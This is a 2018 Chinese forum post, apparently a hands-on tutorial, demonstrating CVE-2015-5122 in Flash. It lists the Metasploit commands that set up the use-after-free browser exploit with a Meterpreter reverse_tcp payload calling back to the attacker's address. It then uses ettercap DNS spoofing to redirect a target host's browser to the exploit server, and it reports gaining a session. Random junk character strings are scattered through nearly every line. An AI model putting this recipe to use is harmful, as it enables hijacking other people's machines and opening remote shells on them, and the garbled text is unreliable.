cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

+ k0 `- S; k& `8 Z# X 二、cve2015-5122漏洞实例演示虚拟机 8 n5 H' E3 z1 O- f

: c& l. W5 T4 b) d, u9 b5 t 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 3 J( S1 n7 L2 h+ M1 y8 _: |7 n

6 C1 [( E. C3 L5 V- t search cve-2015-5122如图： ' d7 d$ e; a6 x

" l8 ~7 u, j. k 7 J( F. `8 x" i

6 v. q- i/ y! ?( S) j: X 下面我们敲如下命令： : {" d( T1 T% m0 P) L" t

4 N/ ~/ V+ {0 S* M) x- `- Z use exploit/multi/browser/adobe_flash_opaque_background_uaf 8 F! A( ^5 X/ }

% w2 O; z) T( n# G" L set PAYLOAD windows/meterpreter/reverse_tcp $ N: q* D; }) c# e, j

( L: U* k, _( T% @# \0 l/ q- ~4 r set LHOST 192.168.0.109 / d6 }1 e: E- q0 G2 \6 `

& o0 [ ]( I& Z6 y: _ set URIPATH / /*根目录*/ ! y+ j' ?$ l" z' y* o* e8 V

' `& e9 Q$ H6 J* P set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 6 S0 H" p. s: c, f) m

+ b: w1 c4 I; [+ b* {6 p set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' j9 }* d K7 c

. b2 R7 j( e5 j" v* k" K 然后show options如图： & _/ M- L R6 x* l

" j7 I1 Z. }. S / [* f% r, M4 d E! T! i/ U1 D

' O# p; ` y0 }; t' `. V; o! v 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
$ ]/ ]# h _# S. T/ J+ u1 c & s0 j3 i* Y& N% v5 }, X

: `7 X n8 C4 n, x 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 6 w$ c: C- h$ L- ~6 ]4 b

4 K% Q9 E" @; \' F# G* l- k Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf # E7 y+ f j* u9 N

" ]; ?# p$ S0 C0 h# p+ X" \, d % Q/ `8 z1 z/ @. t* ~8 {7 d, ]2 p

* j& j4 B7 d3 K+ o 成功了，这时候我们断开ettercap，如图： K, O9 [" t* n+ F

0 P+ q t* [- O7 D" h+ P- } u- P- m l" t7 F) B3 z

( E1 H; E1 Z8 W/ l. z Screenshot如图： 3 x( v$ i' d3 x& ^& I4 J: _

% q' J0 {+ ^/ A" h6 s! e& u. A 9 _ {8 P2 N7 u6 T

& f: e; h0 G# L* {4 o ) O2 D& J/ e3 K( v

		自动登录	找回密码
密码			立即注册